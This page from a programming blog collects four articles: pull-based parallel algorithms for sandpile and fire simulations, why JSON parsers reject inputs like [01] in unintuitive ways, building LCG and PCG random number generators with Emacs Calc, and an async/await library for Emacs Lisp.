Articles tagged javascript at null program

When Parallel: Pull, Don't Push

2020-04-30T22:35:51Z

This article was discussed on Hacker News.

I’ve noticed a small pattern across a few of my projects where I had vectorized and parallelized some code. The original algorithm had a “push” approach, the optimized version instead took a “pull” approach. In this article I’ll describe what I mean, though it’s mostly just so I can show off some pretty videos, pictures, and demos.

Sandpiles

A good place to start is the Abelian sandpile model, which, like many before me, completely captured my attention for a while. It’s a cellular automaton where each cell is a pile of grains of sand, a sandpile. At each step, any sandpile with four or more grains of sand spills one grain into each of its four 4-connected neighbors, regardless of the number of grains in those neighboring cells. Cells at the edge spill their grains into oblivion, and those grains no longer exist.

With excess sand falling over the edge, the model eventually hits a stable state where all piles have three or fewer grains. However, until it reaches stability, all sorts of interesting patterns ripple through the cellular automaton. In certain cases, the final pattern itself is beautiful and interesting.

Numberphile has a great video describing how to form a group over recurrent configurations. In short, for any given grid size, there’s a stable identity configuration that, when “added” to any other element in the group, will stabilize back to that element. The identity configuration is a fractal itself, and has been a focus of study on its own.

Computing the identity configuration is really just about running the simulation to completion a couple of times from certain starting configurations. Here’s an animation of the process for computing the 64x64 identity configuration:

As a fractal, the larger the grid, the more self-similar patterns there are to observe. There are lots of samples online, and the biggest I could find was this 3000x3000 on Wikimedia Commons. But I wanted to see one that’s even bigger, damnit! So, skipping to the end, I eventually computed this 10000x10000 identity configuration:

This took 10 days to compute using my optimized implementation:

https://github.com/skeeto/scratch/blob/master/animation/sandpiles.c

I picked an algorithm described in a code golf challenge:

f(ones(n)*6 - f(ones(n)*6))

Where f() is the function that runs the simulation to a stable state.
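
As a rough illustration of that formula, here is a small JavaScript sketch. It is not the optimized C implementation linked above; the names `stabilize` and `identity` and the flat `Int32Array` layout are assumptions made for this example, and it is only practical for tiny grids.

```javascript
// Run the simulation until every pile holds three or fewer grains.
// `grid` is a flat Int32Array of n*n piles; grains that leave the grid vanish.
function stabilize(grid, n) {
    let cur = Int32Array.from(grid);
    for (;;) {
        const next = new Int32Array(n * n);
        let toppled = false;
        for (let y = 0; y < n; y++) {
            for (let x = 0; x < n; x++) {
                const i = y * n + x;
                let v = cur[i];
                if (v >= 4) { v -= 4; toppled = true; }
                // Collect one grain from each in-grid neighbor that topples.
                if (x > 0     && cur[i - 1] >= 4) v++;
                if (x < n - 1 && cur[i + 1] >= 4) v++;
                if (y > 0     && cur[i - n] >= 4) v++;
                if (y < n - 1 && cur[i + n] >= 4) v++;
                next[i] = v;
            }
        }
        if (!toppled) return cur;  // nothing changed: stable
        cur = next;
    }
}

// identity = f(ones(n)*6 - f(ones(n)*6))
function identity(n) {
    const sixes = new Int32Array(n * n).fill(6);
    const once = stabilize(sixes, n);
    const diff = sixes.map((v, i) => v - once[i]);
    return stabilize(diff, n);
}

console.log(Array.from(identity(3)).join(""));  // 212101212
```

A quick sanity check on the result: adding the identity to itself cell by cell and stabilizing should give the identity back.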

I used OpenMP to parallelize across cores, and SIMD to parallelize within a thread. Each thread operates on 32 sandpiles at a time. To compute the identity sandpile, each sandpile only needs 3 bits of state, so this could potentially be increased to 85 sandpiles at a time on the same hardware. The output format is my old mainstay, Netpbm, including the video output.

Sandpile push and pull

So, what do I mean about pushing and pulling? The naive approach to simulating sandpiles looks like this:

// output starts out all zeros
for each i in sandpiles {
    if input[i] < 4 {
        output[i] = output[i] + input[i]
    } else {
        output[i] = output[i] + input[i] - 4
        for each j in neighbors {
            output[j] = output[j] + 1
        }
    }
}

As the algorithm examines each cell, it pushes results into neighboring cells. If we’re using concurrency, that means multiple threads of execution may be mutating the same cell, which requires synchronization — locks, atomics, etc. That much synchronization is the death knell of performance. The threads will spend all their time contending for the same resources, even if it’s just false sharing.

The solution is to pull grains from neighbors:

for each i in sandpiles {
    if input[i] < 4 {
        output[i] = input[i]
    } else {
        output[i] = input[i] - 4
    }
    for each j in neighbors {
        if input[j] >= 4 {
            output[i] = output[i] + 1
        }
    }
}

Each thread only modifies one cell — the cell it’s in charge of updating — so no synchronization is necessary. It’s shader-friendly and should sound familiar if you’ve seen my WebGL implementation of Conway’s Game of Life. It’s essentially the same algorithm. If you chase down the various Abelian sandpile references online, you’ll eventually come across a 2017 paper by Cameron Fish about running sandpile simulations on GPUs. He cites my WebGL Game of Life article, bringing everything full circle. We had spoken by email at the time, and he shared his interactive simulation with me.

Vectorizing this algorithm is straightforward: Load multiple piles at once, one per SIMD channel, and use masks to implement the branches. In my code I’ve also unrolled the loop. To avoid bounds checking in the SIMD code, I pad the state data structure with zeros so that the edge cells have static neighbors and are no longer special.
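
Here is a scalar JavaScript sketch of one pull step over a zero-padded grid. It is not the SIMD code from the linked C source; the function name `step` and the `(w+2)*(h+2)` layout are assumptions for illustration. Summing comparison results stands in for the masks a vectorized version would use.

```javascript
// One pull step. `input` and `output` are Int32Arrays of (w+2)*(h+2)
// cells: the real grid surrounded by a one-cell border of zeros.
// Only interior cells are written, so the border stays zero and edge
// cells need no special cases. Returns true if any pile toppled.
function step(input, output, w, h) {
    const stride = w + 2;
    let toppled = false;
    for (let y = 1; y <= h; y++) {
        for (let x = 1; x <= w; x++) {
            const i = y * stride + x;
            const v = input[i];
            const spill = v >= 4 ? 4 : 0;
            // Booleans add as 0 or 1, so this counts toppling neighbors.
            const gain = (input[i - 1] >= 4) + (input[i + 1] >= 4) +
                         (input[i - stride] >= 4) + (input[i + stride] >= 4);
            output[i] = v - spill + gain;
            if (spill) toppled = true;
        }
    }
    return toppled;
}
```

Calling `step` repeatedly while swapping the two buffers, until it returns false, runs the simulation to a stable state. Each output cell is written by exactly one iteration, so the loop body could be split across threads without locks.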

WebGL Fire

Back in the old days, one of the cool graphics tricks was fire animations. It was so easy to implement on limited hardware. In fact, the most obvious way to compute it was directly in the framebuffer, such as in the VGA buffer, with no outside state.

There’s a heat source at the bottom of the screen, and the algorithm runs from bottom up, propagating that heat upwards randomly. Here’s the algorithm using traditional screen coordinates (top-left corner origin):

func rand(min, max) // random integer in [min, max]

for each x, y from bottom {
    buf[y-1][x+rand(-1, 1)] = buf[y][x] - rand(0, 1)
}

As a push algorithm it works fine with a single thread, but it doesn’t translate well to modern video hardware. So convert it to a pull algorithm!

for each x, y {
    sx = x + rand(-1, 1)
    sy = y + rand(1, 2)
    output[y][x] = input[sy][sx] - rand(0, 1)
}

Cells pull the fire upward from the bottom. Though this time there’s a catch: This algorithm will have subtly different results.

In the original, there’s a single state buffer and so a flame could propagate upwards multiple times in a single pass. I’ve compensated here by allowing a flame to propagate further at once.
In the original, a flame only propagates to one other cell. In this version, two cells might pull from the same flame, cloning it.

In the end it’s hard to tell the difference, so this works out.

source code and instructions

There’s still potentially contention in that rand() function, but this can be resolved with a hash function that takes x and y as inputs.
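
A CPU-side JavaScript sketch of that idea follows. It is not the WebGL shader from the demo: `hash32`, `fireStep`, the `HEAT` constant, the frame counter input, and the choice to clamp at the left and right edges are all assumptions made for this example, and the hash is just one plausible integer mixer.

```javascript
const HEAT = 255;  // assumed intensity of the heat source below the bottom row

// Hypothetical stateless replacement for rand(): mix x, y, and a frame
// counter into 32 pseudo-random bits. No shared state, so no contention.
function hash32(x, y, frame) {
    let h = Math.imul(x, 0x9e3779b1) ^ Math.imul(y, 0x85ebca6b) ^
            Math.imul(frame, 0xc2b2ae35);
    h ^= h >>> 16;
    h = Math.imul(h, 0x7feb352d);
    h ^= h >>> 15;
    h = Math.imul(h, 0x846ca68b);
    h ^= h >>> 16;
    return h >>> 0;
}

// Pull version of the fire: every cell reads from one or two rows below.
// `input` and `output` are Uint8Arrays of w*h cells, top-left origin.
function fireStep(input, output, w, h, frame) {
    for (let y = 0; y < h; y++) {
        for (let x = 0; x < w; x++) {
            const r = hash32(x, y, frame);
            const dx = (r % 3) - 1;           // -1, 0, or 1
            const dy = 1 + ((r >>> 8) & 1);   // 1 or 2
            const cool = (r >>> 16) & 1;      // 0 or 1
            const sx = Math.min(w - 1, Math.max(0, x + dx));
            const sy = y + dy;
            const src = sy >= h ? HEAT : input[sy * w + sx];
            output[y * w + x] = Math.max(0, src - cool);
        }
    }
}
```

Because each cell's random choices depend only on its coordinates and the frame number, the cells can be computed in any order, or all at once.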

Unintuitive JSON Parsing

2019-12-28T17:23:09Z

This article was discussed on Hacker News and on reddit.

Despite the goal of JSON being a subset of JavaScript — which it failed to achieve (update: this was fixed) — parsing JSON is quite unlike parsing a programming language. For invalid inputs, the specific cause of error is often counter-intuitive. Normally this doesn’t matter, but I recently ran into a case where it does.

Consider this invalid input to a JSON parser:

[01]

To a human this might be interpreted as an array containing a number. Either the leading zero is ignored, or it indicates octal, as it does in many languages, including JavaScript. In either case the number in the array would be 1.

However, JSON does not support leading zeros, neither ignoring them nor supporting octal notation. Here’s the railroad diagram for numbers from the JSON specification:

Or in regular expression form:

-?(0|[1-9][0-9]*)(\.[0-9]+)?([eE][+-]?[0-9]+)?

If a token starts with 0 then it can only be followed by ., e, or E. It cannot be followed by a digit. So, the natural human response to mentally parsing [01] is: This input is invalid because it contains a number with a leading zero, and leading zeros are not accepted. But this is not actually why parsing fails!

A simple model of the parser is one that consumes tokens from a lexer. The lexer’s job is to read individual code points (characters) from the input and group them into tokens. The possible tokens are string, number, left brace, right brace, left bracket, right bracket, comma, colon, true, false, and null. The lexer skips over insignificant whitespace, and it doesn’t care about structure, like matching braces and brackets. That’s the parser’s job.

In some instances the lexer can fail to parse a token. For example, if while looking for a new token the lexer reads the character %, then the input must be invalid. No token starts with this character. So in some cases invalid input will be detected by the lexer.

The parser consumes tokens from the lexer and, using some state, ensures the sequence of tokens is valid. For example, arrays must be a well-formed sequence of left bracket, value, comma, value, comma, etc., right bracket. One way to reject input with trailing garbage is for the lexer to also produce an EOF (end of file/input) token when there are no more tokens, and the parser could specifically check for that token before accepting the input as valid.

Getting back to the input [01], a JSON parser receives a left bracket token, then updates its bookkeeping to track that it’s parsing an array. When looking for the next token, the lexer sees the character 0 followed by 1. According to the railroad diagram, this is a number token (starts with 0), but 1 cannot be part of this token, so it produces a number token with the contents “0”. Everything is still fine.

Next the lexer sees 1 followed by ]. Since ] cannot be part of a number, it produces another number token with the contents “1”. The parser receives this token but, since it’s parsing an array, it expects either a comma token or a right bracket. Since this is neither, the parser fails with an error about an unexpected number. The parser will not complain about leading zeros because JSON has no concept of leading zeros. Human intuition is right, but for the wrong reasons.
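
To make the lexer's view concrete, here is a minimal JavaScript sketch of such a lexer. It is not the parser discussed in this article: the `TOKENS` table and the `lex` function are hypothetical names, and the number pattern is simply the regular expression shown earlier, applied at the current position with the sticky flag.

```javascript
// Token patterns, tried in order at the current position (sticky "y" flag).
const TOKENS = [
    ["number", /-?(0|[1-9][0-9]*)(\.[0-9]+)?([eE][+-]?[0-9]+)?/y],
    ["string", /"([^"\\\u0000-\u001f]|\\(["\\\/bfnrt]|u[0-9a-fA-F]{4}))*"/y],
    ["true",   /true/y],
    ["false",  /false/y],
    ["null",   /null/y],
    ["punct",  /[\[\]{},:]/y],
];

// Group characters into tokens. Knows nothing about structure.
function lex(input) {
    const tokens = [];
    let pos = 0;
    while (pos < input.length) {
        if (" \t\n\r".includes(input[pos])) { pos++; continue; }
        let matched = false;
        for (const [type, re] of TOKENS) {
            re.lastIndex = pos;
            const m = re.exec(input);
            if (m) {
                tokens.push({ type, text: m[0] });
                pos = re.lastIndex;
                matched = true;
                break;
            }
        }
        if (!matched) {
            throw new SyntaxError("no token starts at position " + pos);
        }
    }
    return tokens;
}

console.log(lex("[01]").map(t => t.text).join(" "));  // [ 0 1 ]
```

The lexer happily produces four tokens for `[01]`. Rejecting the second number is left to whatever consumes the token stream.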

Try this for yourself in your favorite JSON parser. Or even just pop up the JavaScript console in your browser and try it out:

JSON.parse('[01]');

Firefox reports:

SyntaxError: JSON.parse: expected ‘,’ or ‘]’ after array element

Chromium reports:

SyntaxError: Unexpected number in JSON

Edge reports (note it says “number” not “digit”):

Error: Invalid number at position:3

In all cases the parsers accepted a zero as the first array element, then rejected the input after the second number token for being a bad sequence of tokens. In other words, this is a parser error rather than a lexer error, as a human might intuit.

My JSON parser comes with a testing tool that shows the token stream up until the parser rejects the input, useful for understanding these situations:

$ echo '[01]' | tests/stream
struct expect seq[] = {
    {JSON_ARRAY},
    {JSON_NUMBER, "0"},
    {JSON_ERROR},
};

There’s an argument to be made here that perhaps the human readable error message should mention leading zeros, since that’s likely the cause of the invalid input. That is, a human probably thought JSON allowed leading zeros, and so the clearer message would tell the human that JSON does not allow leading zeros. This is the “more art than science” part of parsing.

It’s the same story with this invalid input:

[truefalse]

From this input, the lexer unambiguously produces left bracket, true, false, right bracket. It’s still up to the parser to reject this input. The only reason we never see truefalse in valid JSON is that the overall structure never allows these tokens to be adjacent, not because they’d be ambiguous. Programming languages have identifiers, and in a programming language this would parse as the identifier truefalse rather than true followed by false. From this point of view, JSON seems quite strange.

Just as before, Firefox reports:

SyntaxError: JSON.parse: expected ‘,’ or ‘]’ after array element

Chromium reports the same error as it does for [true false]:

SyntaxError: Unexpected token f in JSON

Edge’s message is probably a minor bug in their JSON parser:

Error: Expected ‘]’ at position:10

Position 10 is the last character in false. The lexer consumed false from the input, produced a “false” token, then the parser rejected the input. When it reported the error, it chose the end of the invalid token as the error position rather than the start, despite the fact that the only two valid tokens (comma, right bracket) are both a single character. It should also say “Expected ‘]’ or ‘,’” (as Firefox does) rather than just “]”.

Concatenated JSON

That’s all pretty academic. Except for producing nice error messages, nobody really cares so much why the input was rejected. The mismatch between intuition and reality isn’t important.

However, it does come up with concatenated JSON. Some parsers, including mine, will optionally consume multiple JSON values, one after another, from the same input. Here’s an example from one of my favorite command line tools, jq:

$ echo '{"x":0,"y":1}{"x":2,"y":3}{"x":4,"y":5}' | jq '.x + .y'
1
5
9

The input contains three unambiguously-concatenated JSON objects, so the parser produces three distinct objects. Now consider this input, this time outside of the context of an array:

01

Is this invalid, one number, or two numbers? According to the lexer and parser model described above, this is valid and unambiguously two concatenated numbers. Here’s what my parser says:

$ echo '01' | tests/stream
struct expect seq[] = {
    {JSON_NUMBER, "0"},
    {JSON_DONE},
    {JSON_NUMBER, "1"},
    {JSON_DONE},
    {JSON_ERROR},
};

Note: The JSON_DONE “token” indicates acceptance, and the JSON_ERROR token is an EOF indicator, not a hard error. Since jq allows leading zeros in its JSON input, it’s ambiguous and parses this as the number 1, so asking its opinion on this input isn’t so interesting. I surveyed some other JSON parsers that accept concatenated JSON:

Jackson: Reject as leading zero.
Noggit: Reject as leading zero.
yajl: Accept as two numbers.

For my parser it’s the same story for truefalse:

$ echo 'truefalse' | tests/stream
struct expect seq[] = {
    {JSON_TRUE, "true"},
    {JSON_DONE},
    {JSON_FALSE, "false"},
    {JSON_DONE},
    {JSON_ERROR},
};

Neither rejecting nor accepting this input is wrong, per se. Concatenated JSON is outside of the scope of JSON itself, and concatenating arbitrary JSON objects without a whitespace delimiter can lead to weird and ill-formed input. This is all a great argument in favor of Newline Delimited JSON, and its two simple rules:

Line separator is '\n'
Each line is a valid JSON value

This solves the concatenation issue, and, even more, it works well with parsers not supporting concatenation: Split the input on newlines and pass each line to your JSON parser.
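
In JavaScript that approach is only a few lines. This is a minimal sketch: `parseLines` is a hypothetical helper name, and skipping blank lines (such as the empty string after a trailing newline) is an assumption of this example rather than part of the two rules.

```javascript
// Parse newline-delimited JSON with an ordinary, non-concatenating parser.
function parseLines(input) {
    return input
        .split("\n")
        .filter(line => line.trim() !== "")   // tolerate a trailing newline
        .map(line => JSON.parse(line));
}

const values = parseLines('{"x":0,"y":1}\n{"x":2,"y":3}\n{"x":4,"y":5}\n');
console.log(values.map(v => v.x + v.y).join(" "));  // 1 5 9
```

With this framing, `0` and `1` on separate lines are unambiguously two numbers, and a line containing `01` is rejected by `JSON.parse` like any other invalid value.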

On-the-fly Linear Congruential Generator Using Emacs Calc

2019-11-19T01:17:50Z

I regularly make throwaway “projects” and do a surprising amount of programming in /tmp. For Emacs Lisp, the equivalent is the *scratch* buffer. These are places where I can make a mess, and the mess usually gets cleaned up before it becomes a problem. A lot of my established projects (ex.) start out in volatile storage and only graduate to more permanent storage once the concept has proven itself.

Throughout my whole career, this sort of throwaway experimentation has been an important part of my personal growth, and I try to encourage it in others. Even if the idea I’m trying doesn’t pan out, I usually learn something new, and occasionally it translates into an article here.

I also enjoy small programming challenges. One of the most abused tools in my mental toolbox is the Monte Carlo method, and I readily apply it to solve toy problems. Even beyond this, random number generators are frequently a useful tool (1, 2), so I find myself reaching for one all the time.

Nearly every programming language comes with a pseudo-random number generation function or library. Unfortunately the language’s standard PRNG is usually a poor choice (C, C++, C#, Go). It’s probably mediocre quality, slower than it needs to be, lacks reliable semantics or behavior between implementations, or is missing some other property I want. So I’ve long been a fan of BYOPRNG: Bring Your Own Pseudo-random Number Generator. Just embed a generator with the desired properties directly into the program. The best non-cryptographic PRNGs today are tiny and exceptionally friendly to embedding. Though, depending on what you’re doing, you might need to be creative about seeding.

Crafting a PRNG

On occasion I don’t have an established, embeddable PRNG in reach, and I have yet to commit xoshiro256** to memory. Or maybe I want to use a totally unique PRNG for a particular project. In these cases I make one up. With just a bit of know-how it’s not too difficult.

Probably the easiest decent PRNG to code from scratch is the venerable Linear Congruential Generator (LCG). It’s a simple recurrence relation:

x[1] = (x[0] * A + C) % M

That’s trivial to remember once you know the details. You only need to choose appropriate values for A, C, and M. Done correctly, it will be a full-period generator: a generator that visits a permutation of each of the numbers between 0 and M - 1. The seed, the value of x[0], chooses a starting position in this (looping) permutation.

M has a natural, obvious choice: a power of two matching the range of operands, such as 2^32 or 2^64. With this the modulo operation is free as a natural side effect of the computer architecture.

Choosing C also isn’t difficult. It must be co-prime with M, and since M is a power of two, any odd number is valid. Even 1. In theory choosing a small value like 1 is faster since the compiler won’t need to embed a large integer in the code, but this difference doesn’t show up in any micro-benchmarks I tried. If you want a cool, unique generator, then choose a large random integer. More on that below.

The tricky value is A, and getting it right is the linchpin of the whole LCG. It must be coprime with M (i.e. not even), and, for a full-period generator, A-1 must be divisible by four. For better results, A-1 should not be divisible by 8. A good choice is a prime number that satisfies these properties.
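
These rules are easy to check by brute force on a toy modulus. The JavaScript sketch below uses M = 256 so the whole cycle can be walked; `period` is a hypothetical helper written for this example, not something from the article.

```javascript
// Length of the cycle through 0 for x' = (x*a + c) % m, or 0 if the
// sequence never comes back to 0 within m steps (possible when a is even).
function period(a, c, m) {
    let x = 0;
    for (let n = 1; n <= m; n++) {
        x = (x * a + c) % m;
        if (x === 0) return n;
    }
    return 0;
}

console.log(period(5, 1, 256));  // 256: C odd, A-1 divisible by 4
console.log(period(3, 1, 256));  // 128: A-1 = 2 is not divisible by 4
console.log(period(5, 2, 256));  // 128: C is even, so not coprime with M
```

Only the first combination visits every value from 0 to 255 before repeating. The "A-1 not divisible by 8" advice is about output quality rather than period, so it does not show up in this test.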

If your operands are 64-bit integers, or larger, how are you going to generate a prime number?

Primes from Emacs Calc

Emacs Calc can solve this problem. I’ve noted before how featureful it is. It has arbitrary precision, random number generation, and primality testing. It’s everything we need to choose A. (In fact, this is nearly identical to the process I used to implement RSA.) For this example I’m going to generate a 64-bit LCG for the C programming language, but it’s easy to use whatever width you like and mostly whatever language you like. If you wanted a minimal standard 128-bit LCG, this will still work.

Start by opening up Calc with M-x calc, then:

1. Push 2 on the stack
2. Push 64 on the stack
3. Press ^, computing 2^64 and pushing it on the stack
4. Press k r to generate a random number in this range
5. Press d r 16 to switch to hexadecimal display
6. Press k n to find the next prime following the random value
7. Repeat step 6 until you get a number that ends with 5 or D
8. Press k p a few times to avoid false positives.

What’s left on the stack is your A! If you want a random value for C, you can follow a similar process. Heck, make it prime, too!

The reason for using hexadecimal (step 5) and looking for 5 or D (step 7) is that such numbers satisfy both of the important properties for A-1.

Calc doesn’t try to factor your random integer. Instead it uses the Miller–Rabin primality test, a probabilistic test that, itself, requires random numbers. It has false positives but no false negatives. The false positives can be mitigated by repeating the test multiple times, hence step 8.
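
For readers without Emacs at hand, the same checks can be sketched in JavaScript with BigInt. This is not what Calc does internally: `modpow`, `isPrime64`, and `hasGoodShape` are hypothetical names, and instead of random bases this version uses a fixed set of small prime bases, a substitution that makes the test deterministic for 64-bit inputs.

```javascript
// b**e mod m by repeated squaring.
function modpow(b, e, m) {
    let r = 1n;
    b %= m;
    while (e > 0n) {
        if (e & 1n) r = (r * b) % m;
        b = (b * b) % m;
        e >>= 1n;
    }
    return r;
}

// Miller-Rabin with the first twelve primes as bases (an assumption of
// this sketch; Calc picks random bases, hence its repeated k p).
const BASES = [2n, 3n, 5n, 7n, 11n, 13n, 17n, 19n, 23n, 29n, 31n, 37n];

function isPrime64(n) {
    if (n < 2n) return false;
    for (const p of BASES) {
        if (n === p) return true;
        if (n % p === 0n) return false;
    }
    let d = n - 1n, s = 0;
    while ((d & 1n) === 0n) { d >>= 1n; s++; }
    witness: for (const a of BASES) {
        let x = modpow(a, d, n);
        if (x === 1n || x === n - 1n) continue;
        for (let i = 1; i < s; i++) {
            x = (x * x) % n;
            if (x === n - 1n) continue witness;
        }
        return false;  // a proves n composite
    }
    return true;
}

// The "ends with 5 or D in hexadecimal" rule: A-1 divisible by 4, not by 8.
function hasGoodShape(a) {
    return (a - 1n) % 4n === 0n && (a - 1n) % 8n !== 0n;
}

console.log(hasGoodShape(0x7c3c3267d015ceb5n));  // true
```

A candidate multiplier would need to pass both `isPrime64` and `hasGoodShape`.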

Trying this all out right now, I got this implementation (in C):

uint64_t lcg1(void)
{
    static uint64_t s = 0;
    s = s*UINT64_C(0x7c3c3267d015ceb5) + UINT64_C(0x24bd2d95276253a9);
    return s;
}

However, we can still do a little better. Outputting the entire state doesn’t have great results, so instead it’s better to create a truncated LCG and only return some portion of the most significant bits.

uint32_t lcg2(void)
{
    static uint64_t s = 0;
    s = s*UINT64_C(0x7c3c3267d015ceb5) + UINT64_C(0x24bd2d95276253a9);
    return s >> 32;
}

This won’t quite pass BigCrush in 64-bit form, but the results are pretty reasonable for most purposes.

But we can still do better without needing to remember much more than this.

Appending permutation

A Permuted Congruential Generator (PCG) is really just a truncated LCG with a permutation applied to its output. Like LCGs themselves, there are arbitrarily many variations. The “official” implementation has a data-dependent shift, for which I can never remember the details. Fortunately a couple of simple, easy-to-remember transformations are sufficient: basically anything I used while prospecting for hash functions. I love xorshifts, so let’s add one of those:

uint32_t pcg1(void)
{
    static uint64_t s = 0;
    s = s*UINT64_C(0x7c3c3267d015ceb5) + UINT64_C(0x24bd2d95276253a9);
    uint32_t r = s >> 32;
    r ^= r >> 16;
    return r;
}

This is a big improvement, but it still fails one BigCrush test. As they say, when xorshift isn’t enough, use xorshift-multiply! Below I generated a 32-bit prime for the multiply, but any odd integer is a valid permutation.

uint32_t pcg2(void)
{
    static uint64_t s = 0;
    s = s*UINT64_C(0x7c3c3267d015ceb5) + UINT64_C(0x24bd2d95276253a9);
    uint32_t r = s >> 32;
    r ^= r >> 16;
    r *= UINT32_C(0x60857ba9);
    return r;
}

This passes BigCrush, and I can reliably build a new one entirely from scratch using Calc any time I need it.

Bonus: Adapting to other languages

Sometimes it’s not so straightforward to adapt this technique to other languages. For example, JavaScript has limited support for 32-bit integer operations (enough for a poor 32-bit LCG) and no 64-bit integer operations. Though BigInt is now a thing, and should make a great 96- or 128-bit LCG easy to build.

function lcg(seed) {
    let s = BigInt(seed);
    return function() {
        s *= 0xef725caa331524261b9646cdn;
        s += 0x213734f2c0c27c292d814385n;
        s &= 0xffffffffffffffffffffffffn;
        return Number(s >> 64n);
    }
}

Java doesn’t have unsigned integers, so how could you build the above PCG in Java? Easy! First, remember that Java has two’s complement semantics, including wrap around, and that two’s complement doesn’t care about unsigned or signed for multiplication (or addition, or subtraction). The result is identical. Second, the oft-forgotten >>> operator does an unsigned right shift. With these two tips:

long s = 0;

int pcg2() {
    s = s*0x7c3c3267d015ceb5L + 0x24bd2d95276253a9L;
    int r = (int)(s >>> 32);
    r ^= r >>> 16;
    r *= 0x60857ba9;
    return r;
}

So, in addition to the Calc step list above, you may need to know some of the finer details of your target language.
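
The same applies to porting the 64-bit pcg2 to JavaScript. The sketch below is one possible translation, not code from the article: the closure-with-seed shape mirrors the BigInt LCG above, `BigInt.asUintN` stands in for 64-bit wraparound, and `Math.imul` provides the 32-bit wrapping multiply.

```javascript
// A possible JavaScript port of pcg2: 64-bit state in a BigInt,
// 32-bit output permutation in ordinary numbers.
function pcg2(seed = 0n) {
    let s = BigInt.asUintN(64, BigInt(seed));
    return function () {
        // Wrap the state to 64 bits, as uint64_t arithmetic would.
        s = BigInt.asUintN(64, s * 0x7c3c3267d015ceb5n + 0x24bd2d95276253a9n);
        let r = Number(s >> 32n);      // upper 32 bits of the state
        r ^= r >>> 16;                 // xorshift (result is a signed int32)
        r = Math.imul(r, 0x60857ba9);  // multiply modulo 2^32
        return r >>> 0;                // reinterpret as unsigned
    };
}

const next = pcg2(0n);
console.log(next(), next(), next());
```

The details to know here are that bitwise operators work on signed 32-bit values, that a plain `*` would lose low bits for large products, and that `>>> 0` converts the final result back to an unsigned 32-bit value.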

An Async / Await Library for Emacs Lisp

2019-03-10T20:57:03Z

As part of building my Python proficiency, I’ve learned how to use asyncio. This new language feature first appeared in Python 3.5 (PEP 492, September 2015). JavaScript grew a nearly identical feature in ES2017 (June 2017). An async function can pause to await on an asynchronously computed result, much like a generator pausing when it yields a value.

In fact, both Python and JavaScript async functions are essentially just fancy generator functions with some specialized syntax and semantics. That is, they’re stackless coroutines. Both languages already had generators, so their generator-like async functions are a natural extension that, unlike stackful coroutines, does not require significant new runtime plumbing.

Emacs officially got generators in 25.1 (September 2016), though, unlike Python and JavaScript, it didn’t require any additional support from the compiler or runtime. It’s implemented entirely using Lisp macros. In other words, it’s just another library, not a core language feature. In theory, the generator library could be easily backported to the first Emacs release to properly support lexical closures, Emacs 24.1 (June 2012).

For the same reason, stackless async/await coroutines can also be implemented as a library. So that’s what I did, letting Emacs’ generator library do most of the heavy lifting. The package is called aio:

https://github.com/skeeto/emacs-aio

It’s modeled more closely on JavaScript’s async functions than Python’s asyncio, with the core representation being promises rather than coroutine objects. I just have an easier time reasoning about promises than coroutines.

I’m definitely not the first person to realize this was possible, and was beaten to the punch by two years. Wanting to avoid fragmentation, I set aside all formality in my first iteration on the idea, not even bothering with namespacing my identifiers. It was to be only an educational exercise. However, I got quite attached to my little toy. Once I got my head wrapped around the problem, everything just sort of clicked into place so nicely.

In this article I will show step-by-step one way to build async/await on top of generators, laying out one concept at a time and then building upon each. But first, some examples to illustrate the desired final result.

aio example

Ignoring all its problems for a moment, suppose you want to use url-retrieve to fetch some content from a URL and return it. To keep this simple, I’m going to omit error handling. Also assume that lexical-binding is t for all examples. Besides, lexical scope is required by the generator library, and therefore also required by aio.

The most naive approach is to fetch the content synchronously:

(defun fetch-fortune-1 (url)
  (let ((buffer (url-retrieve-synchronously url)))
    (with-current-buffer buffer
      (prog1 (buffer-string)
        (kill-buffer)))))

The result is returned directly, and errors are communicated by an error signal (i.e. Emacs’ version of exceptions). This is convenient, but the function will block the main thread, locking up Emacs until the result has arrived. This is obviously very undesirable, so, in practice, everyone nearly always uses the asynchronous version:

(defun fetch-fortune-2 (url callback)
  (url-retrieve url (lambda (_status)
                      (funcall callback (buffer-string)))))

The main thread no longer blocks, but it’s a whole lot less convenient. The result isn’t returned to the caller, and instead the caller supplies a callback function. The result, whether success or failure, will be delivered via callback, so the caller must split itself into two pieces: the part before the callback and the callback itself. Errors cannot be delivered using an error signal because of the inverted flow control.

The situation gets worse if, say, you need to fetch results from two different URLs. You either fetch results one at a time (inefficient), or you manage two different callbacks that could be invoked in any order, and therefore have to coordinate.

Wouldn’t it be nice for the function to work like the first example, but be asynchronous like the second example? Enter async/await:

(aio-defun fetch-fortune-3 (url)
  (let ((buffer (aio-await (aio-url-retrieve url))))
    (with-current-buffer buffer
      (prog1 (buffer-string)
        (kill-buffer)))))

A function defined with aio-defun is just like defun except that it can use aio-await to pause and wait on any other function defined with aio-defun (or, more specifically, any function that returns a promise). Borrowing Python parlance: Returning a promise makes a function awaitable. If there’s an error, it’s delivered as an error signal from aio-url-retrieve, just like the first example. When called, this function returns immediately with a promise object that represents a future result. The caller might look like this:

(defcustom fortune-url ...)

(aio-defun display-fortune ()
  (interactive)
  (message "%s" (aio-await (fetch-fortune-3 fortune-url))))

How wonderfully clean that looks! And, yes, it even works with interactive like that. I can M-x display-fortune and a fortune is printed in the minibuffer as soon as the result arrives from the server. In the meantime Emacs doesn’t block and I can continue my work.

You can’t do anything you couldn’t already do before. It’s just a nicer way to organize the same callbacks: implicit rather than explicit.

Promises, simplified

The core object at play is the promise. Promises are already a rather simple concept, but aio promises have been distilled to their essence, as they’re only needed for this singular purpose. More on this later.

As I said, a promise represents a future result. In practical terms, a promise is just an object to which one can subscribe with a callback. When the result is ready, the callbacks are invoked. Another way to put it is that promises reify the concept of callbacks. A callback is no longer just the idea of an extra argument to a function. It’s a first-class thing that itself can be passed around as a value.

Promises have two slots: the final promise result and a list of subscribers. A nil result means the result hasn’t been computed yet. It’s so simple I’m not even bothering with cl-struct.

(defun aio-promise ()
  "Create a new promise object."
  (record 'aio-promise nil ()))

(defsubst aio-promise-p (object)
  (and (eq 'aio-promise (type-of object))
       (= 3 (length object))))

(defsubst aio-result (promise)
  (aref promise 1))

To subscribe to a promise, use aio-listen:

(defun aio-listen (promise callback)
  (let ((result (aio-result promise)))
    (if result
        (run-at-time 0 nil callback result)
      (push callback (aref promise 2)))))

If the result isn’t ready yet, add the callback to the list of subscribers. If the result is ready, call the callback in the next event loop turn using run-at-time. This is important because it keeps all the asynchronous components isolated from one another. They won’t see each other’s frames on the call stack, nor frames from aio. This is so important that the Promises/A+ specification is explicit about it.

